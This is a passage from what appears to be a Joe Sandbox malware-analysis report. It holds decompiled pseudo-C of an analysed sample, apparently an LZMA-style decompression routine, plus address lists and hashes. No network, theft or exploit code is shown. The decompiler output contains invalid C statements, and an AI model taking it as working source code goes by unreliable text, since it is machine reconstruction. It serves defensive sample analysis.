                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													 *(__ebp - 0x40) = 1;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													__ebx = __ebx + __ebx + 1;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edx;
                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L39;
                          												} else {
                          													goto L37;
                          												}
                          											case 0xe:
                          												L46:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xe;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t156 = __ebp - 0x70;
                          												 *_t156 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t156;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												while(1) {
                          													L48:
                          													__eflags = __ebx - 0x100;
                          													if(__ebx >= 0x100) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x58);
                          													__edx = __ebx + __ebx;
                          													__ecx =  *(__ebp - 0x10);
                          													__esi = __edx + __eax;
                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                          													__ax =  *__esi;
                          													 *(__ebp - 0x54) = __esi;
                          													__edi = __ax & 0x0000ffff;
                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          													__eflags =  *(__ebp - 0xc) - __ecx;
                          													if( *(__ebp - 0xc) >= __ecx) {
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          														__cx = __ax;
                          														_t170 = __edx + 1; // 0x1
                          														__ebx = _t170;
                          														__cx = __ax >> 5;
                          														__eflags = __eax;
                          														 *__esi = __ax;
                          													} else {
                          														 *(__ebp - 0x10) = __ecx;
                          														0x800 = 0x800 - __edi;
                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          														__ebx = __ebx + __ebx;
                          														 *__esi = __cx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														continue;
                          													} else {
                          														goto L46;
                          													}
                          												}
                          												L54:
                          												_t173 = __ebp - 0x34;
                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          												__eflags =  *_t173;
                          												goto L55;
                          											case 0xf:
                          												L58:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xf;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t203 = __ebp - 0x70;
                          												 *_t203 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t203;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L60:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													L55:
                          													__al =  *(__ebp - 0x44);
                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          													goto L56;
                          												}
                          												L61:
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t217 = __edx + 1; // 0x1
                          													__ebx = _t217;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L60;
                          												} else {
                          													goto L58;
                          												}
                          											case 0x10:
                          												L109:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x10;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t365 = __ebp - 0x70;
                          												 *_t365 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t365;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												goto L111;
                          											case 0x11:
                          												goto L69;
                          											case 0x12:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 0x58);
                          													 *(__ebp - 0x84) = 0x13;
                          													__esi =  *(__ebp - 0x58) + 2;
                          													while(1) {
                          														L132:
                          														 *(_t613 - 0x54) = _t606;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												__eflags = __eax;
                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                          												goto L130;
                          											case 0x13:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													_t469 = __ebp - 0x58;
                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                          													__eflags =  *_t469;
                          													 *(__ebp - 0x30) = 0x10;
                          													 *(__ebp - 0x40) = 8;
                          													L144:
                          													 *(__ebp - 0x7c) = 0x14;
                          													goto L145;
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												 *(__ebp - 0x30) = 8;
                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          												L130:
                          												 *(__ebp - 0x58) = __eax;
                          												 *(__ebp - 0x40) = 3;
                          												goto L144;
                          											case 0x14:
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          												__eax =  *(__ebp - 0x80);
                          												 *(_t613 - 0x88) = _t533;
                          												goto L1;
                          											case 0x15:
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xb;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          												goto L120;
                          											case 0x16:
                          												__eax =  *(__ebp - 0x30);
                          												__eflags = __eax - 4;
                          												if(__eax >= 4) {
                          													_push(3);
                          													_pop(__eax);
                          												}
                          												__ecx =  *(__ebp - 4);
                          												 *(__ebp - 0x40) = 6;
                          												__eax = __eax << 7;
                          												 *(__ebp - 0x7c) = 0x19;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L145;
                          											case 0x17:
                          												L145:
                          												__eax =  *(__ebp - 0x40);
                          												 *(__ebp - 0x50) = 1;
                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          												goto L149;
                          											case 0x18:
                          												L146:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x18;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t484 = __ebp - 0x70;
                          												 *_t484 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t484;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L148:
                          												_t487 = __ebp - 0x48;
                          												 *_t487 =  *(__ebp - 0x48) - 1;
                          												__eflags =  *_t487;
                          												L149:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__ecx =  *(__ebp - 0x40);
                          													__ebx =  *(__ebp - 0x50);
                          													0 = 1;
                          													__eax = 1 << __cl;
                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          													__eax =  *(__ebp - 0x7c);
                          													 *(__ebp - 0x44) = __ebx;
                          													while(1) {
                          														 *(_t613 - 0x88) = _t533;
                          														goto L1;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x50);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          												__eax =  *(__ebp - 0x58);
                          												__esi = __edx + __eax;
                          												 *(__ebp - 0x54) = __esi;
                          												__ax =  *__esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													__cx = __ax >> 5;
                          													__eax = __eax - __ecx;
                          													__edx = __edx + 1;
                          													__eflags = __edx;
                          													 *__esi = __ax;
                          													 *(__ebp - 0x50) = __edx;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L148;
                          												} else {
                          													goto L146;
                          												}
                          											case 0x19:
                          												__eflags = __ebx - 4;
                          												if(__ebx < 4) {
                          													 *(__ebp - 0x2c) = __ebx;
                          													L119:
                          													_t393 = __ebp - 0x2c;
                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                          													__eflags =  *_t393;
                          													L120:
                          													__eax =  *(__ebp - 0x2c);
                          													__eflags = __eax;
                          													if(__eax == 0) {
                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          														goto L170;
                          													}
                          													__eflags = __eax -  *(__ebp - 0x60);
                          													if(__eax >  *(__ebp - 0x60)) {
                          														goto L171;
                          													}
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          													__eax =  *(__ebp - 0x30);
                          													_t400 = __ebp - 0x60;
                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          													__eflags =  *_t400;
                          													goto L123;
                          												}
                          												__ecx = __ebx;
                          												__eax = __ebx;
                          												__ecx = __ebx >> 1;
                          												__eax = __ebx & 0x00000001;
                          												__ecx = (__ebx >> 1) - 1;
                          												__al = __al | 0x00000002;
                          												__eax = (__ebx & 0x00000001) << __cl;
                          												__eflags = __ebx - 0xe;
                          												 *(__ebp - 0x2c) = __eax;
                          												if(__ebx >= 0xe) {
                          													__ebx = 0;
                          													 *(__ebp - 0x48) = __ecx;
                          													L102:
                          													__eflags =  *(__ebp - 0x48);
                          													if( *(__ebp - 0x48) <= 0) {
                          														__eax = __eax + __ebx;
                          														 *(__ebp - 0x40) = 4;
                          														 *(__ebp - 0x2c) = __eax;
                          														__eax =  *(__ebp - 4);
                          														__eax =  *(__ebp - 4) + 0x644;
                          														__eflags = __eax;
                          														L108:
                          														__ebx = 0;
                          														 *(__ebp - 0x58) = __eax;
                          														 *(__ebp - 0x50) = 1;
                          														 *(__ebp - 0x44) = 0;
                          														 *(__ebp - 0x48) = 0;
                          														L112:
                          														__eax =  *(__ebp - 0x40);
                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          															_t391 = __ebp - 0x2c;
                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          															__eflags =  *_t391;
                          															goto L119;
                          														}
                          														__eax =  *(__ebp - 0x50);
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          														__eax =  *(__ebp - 0x58);
                          														__esi = __edi + __eax;
                          														 *(__ebp - 0x54) = __esi;
                          														__ax =  *__esi;
                          														__ecx = __ax & 0x0000ffff;
                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          														__eflags =  *(__ebp - 0xc) - __edx;
                          														if( *(__ebp - 0xc) >= __edx) {
                          															__ecx = 0;
                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          															__ecx = 1;
                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          															__ebx = 1;
                          															__ecx =  *(__ebp - 0x48);
                          															__ebx = 1 << __cl;
                          															__ecx = 1 << __cl;
                          															__ebx =  *(__ebp - 0x44);
                          															__ebx =  *(__ebp - 0x44) | __ecx;
                          															__cx = __ax;
                          															__cx = __ax >> 5;
                          															__eax = __eax - __ecx;
                          															__edi = __edi + 1;
                          															__eflags = __edi;
                          															 *(__ebp - 0x44) = __ebx;
                          															 *__esi = __ax;
                          															 *(__ebp - 0x50) = __edi;
                          														} else {
                          															 *(__ebp - 0x10) = __edx;
                          															0x800 = 0x800 - __ecx;
                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          															 *__esi = __dx;
                          														}
                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                          														if( *(__ebp - 0x10) >= 0x1000000) {
                          															L111:
                          															_t368 = __ebp - 0x48;
                          															 *_t368 =  *(__ebp - 0x48) + 1;
                          															__eflags =  *_t368;
                          															goto L112;
                          														} else {
                          															goto L109;
                          														}
                          													}
                          													__ecx =  *(__ebp - 0xc);
                          													__ebx = __ebx + __ebx;
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          														__ecx =  *(__ebp - 0x10);
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          														__ebx = __ebx | 0x00000001;
                          														__eflags = __ebx;
                          														 *(__ebp - 0x44) = __ebx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L101:
                          														_t338 = __ebp - 0x48;
                          														 *_t338 =  *(__ebp - 0x48) - 1;
                          														__eflags =  *_t338;
                          														goto L102;
                          													} else {
                          														goto L99;
                          													}
                          												}
                          												__edx =  *(__ebp - 4);
                          												__eax = __eax - __ebx;
                          												 *(__ebp - 0x40) = __ecx;
                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          												goto L108;
                          											case 0x1a:
                          												L56:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1a;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x68);
                          												__al =  *(__ebp - 0x5c);
                          												__edx =  *(__ebp - 8);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *( *(__ebp - 0x68)) = __al;
                          												__ecx =  *(__ebp - 0x14);
                          												 *(__ecx +  *(__ebp - 8)) = __al;
                          												__eax = __ecx + 1;
                          												__edx = 0;
                          												_t192 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t192;
                          												goto L80;
                          											case 0x1b:
                          												L76:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1b;
                          													goto L170;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t275 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t275;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												_t284 = __ebp - 0x64;
                          												 *_t284 =  *(__ebp - 0x64) - 1;
                          												__eflags =  *_t284;
                          												 *( *(__ebp - 0x68)) = __cl;
                          												L80:
                          												 *(__ebp - 0x14) = __edx;
                          												goto L81;
                          											case 0x1c:
                          												while(1) {
                          													L123:
                          													__eflags =  *(__ebp - 0x64);
                          													if( *(__ebp - 0x64) == 0) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__edx =  *(__ebp - 8);
                          													__cl =  *(__eax + __edx);
                          													__eax =  *(__ebp - 0x14);
                          													 *(__ebp - 0x5c) = __cl;
                          													 *(__eax + __edx) = __cl;
                          													__eax = __eax + 1;
                          													__edx = 0;
                          													_t414 = __eax %  *(__ebp - 0x74);
                          													__eax = __eax /  *(__ebp - 0x74);
                          													__edx = _t414;
                          													__eax =  *(__ebp - 0x68);
                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          													__eflags =  *(__ebp - 0x30);
                          													 *( *(__ebp - 0x68)) = __cl;
                          													 *(__ebp - 0x14) = _t414;
                          													if( *(__ebp - 0x30) > 0) {
                          														continue;
                          													} else {
                          														L81:
                          														 *(__ebp - 0x88) = 2;
                          														goto L1;
                          													}
                          												}
                          												 *(__ebp - 0x88) = 0x1c;
                          												goto L170;
                          										}
                          									}
                          									L171:
                          									_t535 = _t534 | 0xffffffff;
                          									goto L172;
                          								}
                          							}
                          						}
                          					}
                          					goto L1;
                          				}
                          			}













                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004066bb
                          0x004066b8
                          0x00000000
                          0x0040640d

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                          • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                          • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                          • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406355() {
                          				unsigned short _t531;
                          				signed int _t532;
                          				void _t533;
                          				signed int _t534;
                          				signed int _t535;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t589;
                          				signed int* _t606;
                          				void* _t613;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t613 - 0x40) != 0) {
                          						 *(_t613 - 0x84) = 0xa;
                          						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                          					} else {
                          						 *(__ebp - 0x84) = 9;
                          						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          					}
                          					while(1) {
                          						 *(_t613 - 0x54) = _t606;
                          						while(1) {
                          							L133:
                          							_t531 =  *_t606;
                          							_t589 = _t531 & 0x0000ffff;
                          							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          							if( *(_t613 - 0xc) >= _t565) {
                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          								 *(_t613 - 0x40) = 1;
                          								_t532 = _t531 - (_t531 >> 5);
                          								 *_t606 = _t532;
                          							} else {
                          								 *(_t613 - 0x10) = _t565;
                          								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          							}
                          							if( *(_t613 - 0x10) >= 0x1000000) {
                          								goto L139;
                          							}
                          							L137:
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 5;
                          								L170:
                          								_t568 = 0x22;
                          								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                          								_t535 = 0;
                          								L172:
                          								return _t535;
                          							}
                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          							L139:
                          							_t533 =  *(_t613 - 0x84);
                          							while(1) {
                          								 *(_t613 - 0x88) = _t533;
                          								while(1) {
                          									L1:
                          									_t534 =  *(_t613 - 0x88);
                          									if(_t534 > 0x1c) {
                          										break;
                          									}
                          									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                          										case 0:
                          											if( *(_t613 - 0x6c) == 0) {
                          												goto L170;
                          											}
                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          											_t534 =  *( *(_t613 - 0x70));
                          											if(_t534 > 0xe1) {
                          												goto L171;
                          											}
                          											_t538 = _t534 & 0x000000ff;
                          											_push(0x2d);
                          											asm("cdq");
                          											_pop(_t570);
                          											_push(9);
                          											_pop(_t571);
                          											_t609 = _t538 / _t570;
                          											_t540 = _t538 % _t570 & 0x000000ff;
                          											asm("cdq");
                          											_t604 = _t540 % _t571 & 0x000000ff;
                          											 *(_t613 - 0x3c) = _t604;
                          											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                          											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                          											_t612 = (0x300 << _t604 + _t609) + 0x736;
                          											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                          												L10:
                          												if(_t612 == 0) {
                          													L12:
                          													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          													goto L15;
                          												} else {
                          													goto L11;
                          												}
                          												do {
                          													L11:
                          													_t612 = _t612 - 1;
                          													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                          												} while (_t612 != 0);
                          												goto L12;
                          											}
                          											if( *(_t613 - 4) != 0) {
                          												GlobalFree( *(_t613 - 4));
                          											}
                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
